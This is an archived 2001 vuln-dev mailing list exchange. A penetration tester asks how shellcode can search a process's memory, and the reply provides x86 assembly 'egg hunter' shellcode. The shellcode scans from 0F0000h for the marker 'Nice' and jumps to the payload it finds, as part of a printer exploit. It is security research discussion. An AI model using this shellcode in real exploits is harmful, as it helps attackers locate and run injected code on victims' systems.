I wrote this code for the null printer exploit, to search for "Nice" in
memory, starting from 0F0000h. It's very simple
but it works.
The string looks like this in memory:
...."Nicedata: [code]"....
shell_code_start:
mov eax, 0ffffffffh ;
set
sub eax, 0fff0ffffh ;
eax to 0F0000h
search_loop:
inc eax
; eax=eax+1
cmp [eax], dword ptr 'eciN' ; is it
"Nice"?
jne search_loop ; no,
it isn't...loop
add eax, 5 ;
skip some
add eax, 5 ;
bytes
call eax
; call the found code
Well in this case I don't get segfaults, that area is valid.
If you know the range of where the string could be (like in this case, I
found the address using windbg), you can start searching from there.
If you wanna go complex, you can handle the excpetions (iczelion tutorials
covers
them, I think).
Hope it helps some way...
Good luck
----- Original Message -----
From: "Franklin DeMatto" <franklin.listsat_private>
To: <vuln-devat_private>
Sent: Saturday, October 13, 2001 11:32 PM
Subject: searching through the address space of a process
> Is there a way for a process (i.e., shellcode) to search through its
> address space (looking for a particular string, etc.)? I'm interested
> particularly in doing this under Windows, although Unix would be nice
> also. Can this be done without using any API/syscalls, just in assembly
alone?
>
> I can see to basic ways of doing it:
> 1) Determining the address space, and then searching it
> 2) Trying every block, but catching the gpf/segfault exceptions
>
> However, I do not know how to implement either one
>
> Franklin
>
>
>
> Franklin DeMatto
> Senior Analyst, qDefense Penetration Testing
> http://qDefense.com
> qDefense: Making Security Accessible
>
This archive was generated by hypermail 2b30 : Mon Oct 15 2001 - 13:12:40 PDT